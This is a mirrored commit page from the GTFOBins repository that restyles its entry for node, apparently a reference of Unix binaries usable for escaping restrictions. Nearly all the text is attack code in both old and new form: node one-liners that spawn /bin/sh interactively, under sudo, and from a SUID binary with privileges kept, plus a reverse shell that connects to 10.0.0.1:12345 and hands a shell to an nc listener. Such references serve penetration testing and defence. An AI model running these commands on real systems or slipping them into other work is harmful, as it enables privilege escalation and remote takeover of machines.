mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 14:59:44 +01:00
Fix node code style
This commit is contained in:
parent
a2c4dd2965
commit
6e2242d3f1
@ -2,21 +2,21 @@
|
|||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
exec-interactive:
|
||||||
- code: |
|
- code: |
|
||||||
node -e 'require("child_process").spawn("/bin/sh", [], { stdio: [0, 1, 2]});'
|
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: |
|
- code: |
|
||||||
sudo node -e 'require("child_process").spawn("/bin/sh", [], { stdio: [0, 1, 2]});'
|
sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
||||||
suid-enabled:
|
suid-enabled:
|
||||||
- code: |
|
- code: |
|
||||||
./node -e 'require("child_process").spawn("/bin/sh", [ "-p" ], { stdio: [0, 1, 2]});'
|
./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
|
||||||
reverse-shell:
|
reverse-shell:
|
||||||
- description: Run `nc -l -p 12345` to receive the shell on the other end.
|
- description: Run `nc -l -p 12345` to receive the shell on the other end.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=10.0.0.1
|
export RHOST=10.0.0.1
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
node -e 'sh = require("child_process").spawn("/bin/sh", []);
|
node -e 'sh = require("child_process").spawn("/bin/sh");
|
||||||
client = new require("net").Socket();
|
client = new require("net").Socket();
|
||||||
client.connect(process.env.RPORT, process.env.RHOST, function(){
|
client.connect(process.env.RPORT, process.env.RHOST, function () {
|
||||||
client.pipe(sh.stdin);
|
client.pipe(sh.stdin);
|
||||||
sh.stdout.pipe(client);
|
sh.stdout.pipe(client);
|
||||||
sh.stderr.pipe(client);
|
sh.stderr.pipe(client);
|
||||||
|
Loading…
Reference in New Issue
Block a user